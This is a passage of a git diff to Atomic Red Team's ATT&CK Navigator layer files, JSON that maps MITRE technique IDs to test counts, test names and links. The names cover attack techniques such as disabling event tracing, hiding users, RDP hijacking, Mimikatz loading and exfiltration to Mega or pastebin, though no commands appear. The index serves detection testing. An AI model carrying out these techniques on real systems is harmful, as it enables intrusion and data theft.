Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with 
NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions 
Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 646c375897..0b26e0b412 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View 